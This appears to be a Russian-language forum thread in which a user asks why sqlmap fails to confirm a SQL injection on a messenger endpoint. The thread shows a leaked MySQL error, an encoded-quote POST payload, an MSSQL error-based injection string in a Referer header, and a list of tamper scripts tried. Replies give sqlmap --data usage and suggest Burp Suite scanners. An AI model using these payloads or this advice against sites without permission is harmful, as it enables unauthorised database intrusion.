Sqlmap не видит уязвимость уже вроде все перепробывал
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NULL,'1\'\"','2018-09-11 22:46:00')' at line 4
POST /messenger/messenger.php
Host: test-site.com
last_message_id=%2527&message=3&limit=50
уязвимые параметры все три last_message_id,message,limit
Так же referer b user-agent
Referer: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
Пробывал и левел от 1-5 риск 1-3 тамперы пробывал apostrophenullencode.py charencode.py charunicodeencode.py space2mysqlblank.py unmagicquotes.py ничего не помогает не видит скулю и все причем во всех параметрах пишит ничего нет.
Какие еще запросы можно попробывать кто подскажет или это все false positive?
привет кто поможет ни как не могу пройти
[20:57:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11;
U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11' fr
om file 'C:\sqlmap\txt\user-agents.txt'
[20:57:31] [WARNING] you've provided target URL without any GET parameters (e.g.
'http://www.site.com/article.php?id=1') and without providing any POST paramete
rs through option '--data'
Нет параметров которые нужно проверять, т.е. вставляешь URL типа http://site.com/test без каких-либо параметров, а нужно типа http://site.com/test?id=1. А если у тебя есть параметры передаваемые через POST то нужно будет их добавлять через параметр --data, т.е. sqlmap -u "http://site.com/test" --data="id=1<=3"
hackworld, было подобное. В таких случаях часто выручал сканер от BurpSuite. С подключенными доп плагинами-сканерами (ActiveScan и тд. не помню точно названия).
Он находил SQLi, затем я в sqlmap в пейлоады его руками вписывал. Помогало.